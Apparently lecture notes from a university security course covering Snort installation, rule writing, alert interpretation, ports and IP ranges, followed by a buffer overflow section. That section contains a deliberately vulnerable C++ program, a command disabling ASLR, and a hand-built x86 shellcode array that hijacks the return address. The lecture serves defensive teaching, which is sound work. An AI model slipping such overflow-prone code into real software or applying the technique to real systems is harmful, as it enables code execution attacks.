Snort and Applied Intrusion Detection

CS 462 Lecture, Dr. Lawlor

One standard trick for intrusion detection is just to watch ("sniff") all the network traffic, and then log or otherwise freak out when you see known-bad stuff go by. One widely used sniffer is called "snort".

Snort

Setting up snort means:

Download the source code from snort.org/dl
Build the source code with "tar xzvf snort-2.8.3.1.tar.gz; cd snort-2.8.3.1; ./configure; make; sudo make install"
Copy the configuration directory to a secure place, like /etc: "sudo cp -r snort-2.8.3.1/etc /etc/snort"
Edit the "/etc/snort/snort.conf" config file, at least to set the HOME_NET address.
Download snort rules from http://www.snort.org/pub-bin/downloads.cgi. Free registration is required for the latest rules.
Unpack snort rules using "cd /etc/snort; tar xzvf ~/snortrules*", or write your own rules.
Check the snort config file, /etc/snort/snort.conf. It's probably OK.
Run snort as root, like: "snort -de -i eth0 -K ascii -c /etc/snort/snort.conf"

-d shows you everything sent in the packet payloads.
-e shows you the link-layer (Ethernet) headers, like the MAC addresses.
-i eth0 says to listen on your first ethernet device
-K ascii says to log things in human-readable (not binary) format.
-c points to the config file to use.

Snort can be configured to send its output to:

The syslog (see /etc/syslog.conf to figure out where, often it's /var/log/warn)
The snort log directory, normally /var/log/snort/<IP ADDRESS>/<PROTOCOL>:<SOURCE PORT>-<DEST PORT>

Snort Rules

Snort rules use a really hideous syntax, and like me you can spend several hours reading the documentation and still not be able to write snort rules! It's easier to start with an example.

Say you're part of the Ministry of Love (responsible for detention and torture) inside a paranoid dictatorship that hates our freedom. You can sniff out dissidents by writing a rule that matches their traffic, like so:

alert tcp any any -> any any (msg:"Crimethink detected"; content:"freedom"; nocase; sid:9998;)

The format of this rule is:

alert: What to do when the rule fires. In this case, our snort.conf says to write such events to a file called /var/log/snort/alert. Other options include "drop" (do not forward the packet), "activate" to chain rules, etc.
tcp: The protocol that matching packets will use. In this case, good old TCP. udp, icmp, or plain ip work too.
any: the source IP address. These can be written in a bunch of ways, including numeric, subnet, or negation.
any: the source IP port number.
any: the destination IP address.
any: the destination IP port number.
msg: human-readable string to write in the log files when the rule fires.
content: actual packet data to match. You can also write hex digits between pipes, like "|FF|" or "|F0 0F|" (matches the two bytes 0xf0 followed by 0x0f).
nocase: case-insensitive packet data matching.
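sid: Snort ID, which is just an int that shows up in the snort alert file. You can make up a new ID for your own rules; Snort's documentation reserves IDs below 1,000,000 for distributed rules, so local rules conventionally use 1,000,000 and up.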

This rule will alert on the word "freedom" inside any unencrypted TCP communication: web searches, emails, etc.
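To make the content and nocase options concrete, here is a minimal C++ sketch of the kind of matching they describe. This is not Snort's implementation: decode_content and content_matches are hypothetical names made up for illustration, and the decoder ignores Snort's escape sequences.

```cpp
#include <algorithm>
#include <cctype>
#include <stdexcept>
#include <string>

// Decode a Snort-style content string: text outside pipes is literal,
// text between |...| is a list of two-digit hex bytes separated by spaces.
// Simplified sketch (assumption): no support for backslash escapes.
std::string decode_content(const std::string &pattern) {
    std::string out;
    std::string hex_digits;  // digits collected so far for the current byte
    bool in_hex = false;
    for (char c : pattern) {
        if (c == '|') {
            if (!hex_digits.empty())
                throw std::invalid_argument("incomplete hex byte");
            in_hex = !in_hex;
        } else if (!in_hex) {
            out.push_back(c);
        } else if (std::isxdigit(static_cast<unsigned char>(c))) {
            hex_digits.push_back(c);
            if (hex_digits.size() == 2) {
                out.push_back(static_cast<char>(std::stoi(hex_digits, nullptr, 16)));
                hex_digits.clear();
            }
        } else if (c == ' ') {
            if (!hex_digits.empty())
                throw std::invalid_argument("incomplete hex byte");
        } else {
            throw std::invalid_argument("bad character in hex block");
        }
    }
    if (in_hex) throw std::invalid_argument("unterminated hex block");
    return out;
}

// True if `pattern` occurs anywhere in `payload`. With nocase set,
// ASCII letters are compared case-insensitively.
bool content_matches(const std::string &payload, const std::string &pattern,
                     bool nocase) {
    auto same = [nocase](char a, char b) {
        if (!nocase) return a == b;
        return std::tolower(static_cast<unsigned char>(a)) ==
               std::tolower(static_cast<unsigned char>(b));
    };
    return std::search(payload.begin(), payload.end(),
                       pattern.begin(), pattern.end(), same) != payload.end();
}
```

Calling content_matches(payload, decode_content("freedom"), true) on each TCP payload is roughly what the rule above asks for.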

Here's a super-terse example of a more complicated snort rule. The tighter you write the rule, the fewer false matches you get.

Interpreting Snort Alerts

Here's a typical alert, from the "/var/log/snort/alert" file:
[**] [1:9998:0] Crimethink detected [**]
[Priority: 0]
10/02-15:37:53.223238 0:1D:E0:99:A4:FF -> 0:0:5E:0:1:97 type:0x800 len:0x30D
137.229.48.118:47318 -> 209.85.173.127:80 TCP TTL:64 TOS:0x0 ID:5666 IpLen:20 DgmLen:767 DF
***A**** Seq: 0x73F5AA9D Ack: 0xC3B83424 Win: 0x2E TcpLen: 32
TCP Options (3) => NOP NOP TS: 5749972 1782851874

The important things there are:

The Snort ID, 9998
The message, Crimethink detected
The date of the alert, October 2 at 3:37pm (local time).
The source IP address
The source port number
The destination IP address
The destination port number
The length of the incoming datagram
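If you have a lot of alerts to dig through, pulling these fields out by hand gets old fast. Here's a rough C++ sketch that extracts the addresses and ports from the "source -> destination" line of an alert. It assumes the line layout shown in the sample above; Endpoints and parse_endpoints are hypothetical names, not part of snort.

```cpp
#include <regex>
#include <string>

// The four fields we care about from the address line of an alert.
struct Endpoints {
    std::string src_ip;
    int src_port;
    std::string dst_ip;
    int dst_port;
};

// Parse a line like
//   "137.229.48.118:47318 -> 209.85.173.127:80 TCP TTL:64 ..."
// Returns false (leaving `out` untouched) if the line does not start
// with the "ip:port -> ip:port" pattern.
bool parse_endpoints(const std::string &line, Endpoints &out) {
    static const std::regex re(
        R"(^(\d+\.\d+\.\d+\.\d+):(\d{1,5}) -> (\d+\.\d+\.\d+\.\d+):(\d{1,5})\b)");
    std::smatch m;
    if (!std::regex_search(line, m, re)) return false;
    out.src_ip = m[1].str();
    out.src_port = std::stoi(m[2].str());
    out.dst_ip = m[3].str();
    out.dst_port = std::stoi(m[4].str());
    return true;
}
```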

The IP Address:

127.0.0.1 is the "loopback" IP address. Packets sent to this address immediately go back to the sending machine.
UAF's public subnet is 137.229....
10..., 172.16... through 172.31..., and 192.168... are non-routed "private" IP addresses. UAF has a private subnet using 172... addresses.
224... through 239... IP addresses are multicast addresses. Addresses ending in .255 are usually subnet broadcast addresses.
Low numbers can be looked up from the first octet and the IANA IP allocation table. Higher numbers are usually listed as "various entities", since they're a huge mix of stuff.
The xkcd map of the internet is interesting too.
Addresses can also be tracked down to a geographic location using one of the many IP to location searches on the web.
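A first pass at sorting addresses into these buckets is easy to automate. The sketch below uses the standard reserved ranges (127.0.0.0/8 loopback, the RFC 1918 private blocks 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16, and 224.0.0.0/4 multicast). The function names are made up for illustration, and it does not try to guess subnet broadcast addresses, since that depends on the netmask.

```cpp
#include <cstdint>
#include <sstream>
#include <string>

// Parse dotted-quad text into a 32-bit value (first octet in the top byte).
// Returns false on malformed input.
bool parse_ipv4(const std::string &text, std::uint32_t &addr) {
    std::istringstream in(text);
    std::uint32_t result = 0;
    for (int i = 0; i < 4; ++i) {
        int octet = -1;
        char dot = 0;
        if (!(in >> octet) || octet < 0 || octet > 255) return false;
        if (i < 3 && (!(in >> dot) || dot != '.')) return false;
        result = (result << 8) | static_cast<std::uint32_t>(octet);
    }
    char extra;
    if (in >> extra) return false;  // trailing junk after the fourth octet
    addr = result;
    return true;
}

// Rough classification of an IPv4 address by its reserved range.
std::string classify_ipv4(const std::string &text) {
    std::uint32_t a = 0;
    if (!parse_ipv4(text, a)) return "invalid";
    if ((a >> 24) == 127) return "loopback";      // 127.0.0.0/8
    if ((a >> 24) == 10) return "private";        // 10.0.0.0/8
    if ((a >> 20) == 0xAC1) return "private";     // 172.16.0.0/12
    if ((a >> 16) == 0xC0A8) return "private";    // 192.168.0.0/16
    if ((a >> 28) == 0xE) return "multicast";     // 224.0.0.0/4
    if (a == 0xFFFFFFFFu) return "broadcast";     // 255.255.255.255
    return "public";
}
```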

A "traceroute" can show you the network hops that take you to a particular IP:

# /usr/sbin/traceroute target.cs.uaf.edu
traceroute to target.cs.uaf.edu (137.229.25.200), 30 hops max, 40 byte packets
 1  48-1.wireless.uaf.edu (137.229.48.1)  1.453 ms   0.869 ms   0.965 ms
 2  * * *
 3  * * *
# /usr/sbin/traceroute finesse.cs.uiuc.edu
traceroute to finesse.cs.uiuc.edu (128.174.241.207), 30 hops max, 40 byte packets
 1  48-1.wireless.uaf.edu (137.229.48.1)  1.531 ms   1.454 ms   0.962 ms
 2  137.229.95.3  1.287 ms   1.357 ms   1.698 ms
 3  swf-6506-1 (137.229.254.145)  4.192 ms   1.591 ms   2.040 ms
 4  swf-m10-1 (137.229.254.209)  4.060 ms   3.088 ms   1.985 ms
 5  core1-ua-GE0-0-0-0.pnw-gigapop.net (209.124.177.129)  3.781 ms   2.983 ms   4.114 ms
 6  core1-wes-so0-2-0-0.pnw-gigapop.net (209.124.179.37)  43.039 ms   43.824 ms   44.104 ms
 7  hnsp2-wes-ge-0-0-0-0.pnw-gigapop.net (209.124.176.12)  42.826 ms   43.579 ms   41.697 ms
 8  abilene-pnw.pnw-gigapop.net (209.124.179.2)  41.180 ms   41.525 ms   43.449 ms
 9  dnvrng-sttlng.abilene.ucaid.edu (198.32.8.50)  69.073 ms   67.277 ms   66.149 ms
10  kscyng-dnvrng.abilene.ucaid.edu (198.32.8.14)  78.379 ms   77.868 ms   77.004 ms
11  iplsng-kscyng.abilene.ucaid.edu (198.32.8.80)  358.250 ms   366.737 ms   365.043 ms
12  chinng-iplsng.abilene.ucaid.edu (198.32.8.76)  93.672 ms   101.860 ms   102.063 ms
13  mren-chin-ge.abilene.ucaid.edu (198.32.11.98)  95.943 ms   96.129 ms   95.261 ms
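Each hop line lists three round-trip samples, and averaging them makes the big jumps (like hop 5 to hop 6 above, from about 3 ms to about 43 ms) easier to spot. Here's a small C++ sketch that does this; it assumes the traceroute output format shown above, and hop_times_ms and mean_ms are hypothetical helper names.

```cpp
#include <numeric>
#include <sstream>
#include <string>
#include <vector>

// Collect the round-trip times, in milliseconds, from one traceroute hop
// line. A time is any number immediately followed by the token "ms".
// Hops that only show "* * *" produce an empty list.
std::vector<double> hop_times_ms(const std::string &line) {
    std::vector<double> times;
    std::istringstream in(line);
    std::string prev, tok;
    while (in >> tok) {
        if (tok == "ms") {
            std::istringstream num(prev);
            double value = 0.0;
            if (num >> value) times.push_back(value);
        }
        prev = tok;
    }
    return times;
}

// Mean of the samples, or -1 if the hop did not answer at all.
double mean_ms(const std::vector<double> &times) {
    if (times.empty()) return -1.0;
    return std::accumulate(times.begin(), times.end(), 0.0) / times.size();
}
```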

The Port number. Source port numbers are either large (1024 and up) and random, or small (under 1024) and always the same. Port numbers below 1024 can only be bound by root, and are often used by system services (e.g., network daemons).

Port numbers can be looked up in the official IANA port number list, or the much better hyperlinked networksourcery port list. That list does mix TCP and UDP.
Standard ports include:

TCP port 20 & 21, FTP File Transfer Protocol.
TCP port 22, SSH secure shell file & terminal transfer.
TCP port 25, SMTP insecure email.
UDP port 53, DNS domain name system traffic.
UDP ports 67 & 68, DHCP/BOOTP machine startup configuration.
TCP port 80, HTTP web traffic.
TCP port 109 & 110, POP insecure email.
TCP port 443, HTTPS secure web traffic (via SSL).

Windows-specific ports include:

UDP ports 137 & 138 and TCP port 139, NETBIOS name, datagram, and session traffic.
UDP port 1026+, network announcements.

UNIX-specific ports include:

TCP port 23, telnet insecure terminal protocol.

Chatty broadcasting ports include:

UDP port 427, SLP Service Location Protocol. (Macs, Novell)
UDP port 631, IPP, Internet Printing Protocol. (CUPS, other printers)
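When reading alerts it helps to have a few of these in a lookup table. Here's a minimal C++ sketch covering a handful of the ports listed above; it is nowhere near a complete list, and Proto and service_name are hypothetical names.

```cpp
#include <map>
#include <string>
#include <utility>

enum class Proto { TCP, UDP };

// Look up a short service name for a destination port.
// Only a few of the well-known ports from the lists above are included.
std::string service_name(Proto proto, int port) {
    static const std::map<std::pair<Proto, int>, std::string> table = {
        {{Proto::TCP, 20}, "FTP"},    {{Proto::TCP, 21}, "FTP"},
        {{Proto::TCP, 22}, "SSH"},    {{Proto::TCP, 23}, "telnet"},
        {{Proto::TCP, 25}, "SMTP"},   {{Proto::UDP, 53}, "DNS"},
        {{Proto::UDP, 67}, "DHCP/BOOTP"}, {{Proto::UDP, 68}, "DHCP/BOOTP"},
        {{Proto::TCP, 80}, "HTTP"},   {{Proto::TCP, 109}, "POP"},
        {{Proto::TCP, 110}, "POP"},   {{Proto::TCP, 443}, "HTTPS"},
        {{Proto::UDP, 427}, "SLP"},   {{Proto::UDP, 631}, "IPP"},
    };
    auto it = table.find({proto, port});
    return it == table.end() ? std::string("unknown") : it->second;
}
```

For the sample alert, service_name(Proto::TCP, 80) gives "HTTP", so that traffic was a web request.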

Buffer Overflow Details

Actual exploits of buffer overflow attacks are pretty useful to understand, because that helps you fight them.

First, the trick is just to fill up the stack beyond the end of the allocated buffer. For example, the string "aaaabbbbccccdddd" overwrites the return function pointer with "dddd" in this program:

#include <iostream>
using std::cin;
using std::cout;

int happy_innocent_code(void) {
	char str[8]; /* only 8 bytes of stack space */
	cin>>str; /* deliberate bug: before C++20 this read has no length limit */
	cout<<"I just read a string: "<<str<<"!  I'm a big boy!\n";
	return 0;
}

void evil_bad_code(void) {
	cout<<"Mwa ha ha ha...\n";
	cout<<"...er, I can't return.  Crashing.\n";
}

int foo(void) {
	//void *p=(void *)evil_bad_code; /* address of the bad code */
	//printf("evil code is at: '%4s'\n",(char *)&p);
	happy_innocent_code();
	cout<<"How nice!\n";
	return 0;
}

(Try this in NetRun now!)

This crashes, which is bad (so don't use fixed-size char arrays as strings!), but it can do worse than crash; it can execute something malicious. For example, the evil_bad_code is sitting at address 0x8048a44. x86 is little-endian, so in memory that address is the bytes 0x44 0x8a 0x04 0x08, or as characters, "DŠ" followed by two unprintable control characters (the non-ASCII bytes show up in various weird ways on different browsers). If we input the string "aaaabbbbcccc" followed by those four bytes, the happy_innocent_code above will return directly to the evil_bad_code.
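The odd characters come from byte order: x86 stores addresses low byte first, so the attack string has to carry the address in that order. Here's a small C++ sketch of the conversion; little_endian_bytes is a hypothetical helper name.

```cpp
#include <array>
#include <cstdint>

// Split a 32-bit address into the four bytes an x86 machine stores in
// memory, lowest byte first (little-endian).
std::array<unsigned char, 4> little_endian_bytes(std::uint32_t address) {
    return {{
        static_cast<unsigned char>(address & 0xFF),
        static_cast<unsigned char>((address >> 8) & 0xFF),
        static_cast<unsigned char>((address >> 16) & 0xFF),
        static_cast<unsigned char>((address >> 24) & 0xFF),
    }};
}
```

For 0x8048a44 this gives 0x44, 0x8a, 0x04, 0x08, and 0x44 is the ASCII code for 'D'.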

It's even worse if the return address is overwritten with the location of some data the attacker has control over, like the buffer on the stack where the string is stored. Then the attacker can send some machine code, point the return pointer to that code, and then happy_innocent_code will return directly to the attacker's new remote code, usually "shellcode", since it opens a shell the attacker can use to finish off the vulnerable machine.
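Both attacks depend on the unbounded read into a fixed-size array. Here's a sketch of two ways to close that hole in C++, assuming the input is a whitespace-delimited word as in the example: read into a std::string, or keep the array but cap the read with std::setw. The function names are made up for illustration.

```cpp
#include <cstddef>
#include <iomanip>
#include <sstream>  // std::istringstream is handy for feeding test input
#include <string>

// Option 1: read into a std::string, which grows to fit the input
// instead of running off the end of a stack buffer.
std::string read_word(std::istream &in) {
    std::string word;
    in >> word;
    return word;
}

// Option 2: keep the fixed-size array, but limit the read to its size.
// With a width of N, operator>> stores at most N-1 characters plus the
// terminating NUL, so the array cannot overflow.
template <std::size_t N>
void read_word_bounded(std::istream &in, char (&buf)[N]) {
    in >> std::setw(static_cast<int>(N)) >> buf;
}
```

With option 2 and an 8-byte buffer, the input "aaaabbbbccccdddd" is truncated to "aaaabbb", and the rest stays in the stream.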

On Linux, modern kernels will randomly change the location of stuff on the stack, as a way to help defeat buffer overflow attacks. For learning how buffer overflows work, you can disable this by doing (as root):
echo 0 > /proc/sys/kernel/randomize_va_space

On my machine, with stack randomization on I got a different stack address every run:
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfbfb4c0
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbf8bc980
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfb9cc60
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfecd790
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfaeebb0
olawlor@gwala:~/class/cs462/code/buffer_overflow/buffer_overflow_gdb$ ./vulnerable
Password base address=0xbfcdada0
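To check which mode a machine is in before experimenting, you can read the same /proc file back. The C++ sketch below does that and translates the value using the meanings given in the Linux kernel's sysctl documentation; read_aslr_setting and describe_aslr are hypothetical names, and the reader returns -1 if the file can't be read (for example, on a non-Linux machine).

```cpp
#include <fstream>
#include <string>

// Read the integer stored in the kernel's randomization setting file.
// Returns -1 if the file is missing or unreadable.
int read_aslr_setting(
        const std::string &path = "/proc/sys/kernel/randomize_va_space") {
    std::ifstream file(path);
    int value = -1;
    if (!(file >> value)) return -1;
    return value;
}

// Human-readable meaning of the setting.
std::string describe_aslr(int setting) {
    switch (setting) {
    case 0: return "off: addresses are the same every run";
    case 1: return "on: stack, mmap base, and VDSO are randomized";
    case 2: return "on: stack, mmap base, VDSO, and heap are randomized";
    default: return "unknown";
    }
}
```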

Without stack randomization, I get the same address, 0xbffff8c0, for a local variable every time the program is run. If I encode this address into the return function pointer, any machine code loaded into that local variable will get executed. So I can very carefully craft an attack string like this:

unsigned char exploit[exploit_len]={
/* Address       Code                          Assembly  //  Purpose */
/* 0xbffff8c0 */ 0xba, 0x10,0,0,0,          /* mov    $16,%edx  // the string length, in characters */
                 0xb9, 0xe0,0xf8,0xff,0xbf, /* mov    $exploit+0x20,%ecx // the string's address */
                 0xbb, 0x01,0,0,0,          /* mov    $0x1,%ebx // 1 is the `fd' for stdout */
                 0xb8, 0x04,0,0,0,          /* mov    $0x4,%eax // 4 is the syscall number for `write' */
                 0xcd, 0x80,                /* int $0x80  // makes the `write' syscall */

                 0x31, 0xdb,                /* xor    %ebx,%ebx // 0 is our exit code */
                 0xb8, 0x01,0,0,0,          /* mov    $0x1,%eax // 1 is the syscall number for `exit' */
                 0xcd, 0x80,                /* int    $0x80 // makes the `exit' syscall */
                 
                 0,                 /* padding to 0x20 bytes */
                 
/* 0xbffff8e0 */ 'E','V','I','L','_','D','E','E','D','S','_','H','E','R','E','!', /* String to print */

/* 0xbffff8f0 */ 0xE5,0,0,0, 0xE6,0,0,0,    /* more padding */

/* 0xbffff... */ 0xE7,0,0,0,                /* saved frame pointer-- not needed */
/* 0xbffff... */ 0xc0,0xf8,0xff,0xbf,       /* saved program counter-- make address of our exploit! */
};

Here I'm making explicit Linux syscalls in order to print out my string. Note that not only is this sort of attack code painfully annoying to write, it's also very brittle--if you change anything on the attacked machine, the attack will fail. Things that can kill off a buffer overflow attack include:

Changing the stack pointer. This moves the local variable holding your shellcode, making it much tougher to jump into it. Stack randomization like this is now on by default in mainstream Linux distributions.
Changing the stack layout. Same deal, but usually requires a recompile, like a version upgrade.
Changing anything about the machine architecture: machine code, syscall constants, etc. Linux attacks won't work on Windows, and vice versa. x86 attacks won't work on PowerPC, and vice versa.

Overall, weirdness is your friend here!

As a defender, you can pattern-match anything inside this chunk of code. In particular, the bytes 0xCD 0x80 (the int $0x80 instruction) are how this code calls into the Linux kernel, so they're a common pattern to match on. Lots of non-ASCII bytes (NULs and other control characters) in what is supposed to be a string buffer is also a clear sign of an attack!
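Here's a rough C++ sketch of both checks. It's only a heuristic, and the names and the 25% threshold are assumptions picked for illustration: legitimate binary data can contain 0xCD 0x80 too, so expect false matches. In a snort rule the first check would be written with the hex content syntax from earlier, content:"|CD 80|".

```cpp
#include <cstddef>
#include <vector>

// True if the two-byte sequence 0xCD 0x80 (int $0x80) appears anywhere.
bool contains_int80(const std::vector<unsigned char> &data) {
    for (std::size_t i = 0; i + 1 < data.size(); ++i)
        if (data[i] == 0xCD && data[i + 1] == 0x80) return true;
    return false;
}

// Fraction of bytes that are not printable ASCII (tab, CR, LF allowed).
double non_printable_fraction(const std::vector<unsigned char> &data) {
    if (data.empty()) return 0.0;
    std::size_t bad = 0;
    for (unsigned char c : data) {
        bool printable = (c >= 0x20 && c <= 0x7E) ||
                         c == '\t' || c == '\r' || c == '\n';
        if (!printable) ++bad;
    }
    return static_cast<double>(bad) / data.size();
}

// Flag a supposed string buffer as suspicious. The 0.25 threshold is an
// arbitrary starting point, not a tuned value.
bool looks_like_shellcode(const std::vector<unsigned char> &data,
                          double threshold = 0.25) {
    return contains_int80(data) || non_printable_fraction(data) > threshold;
}
```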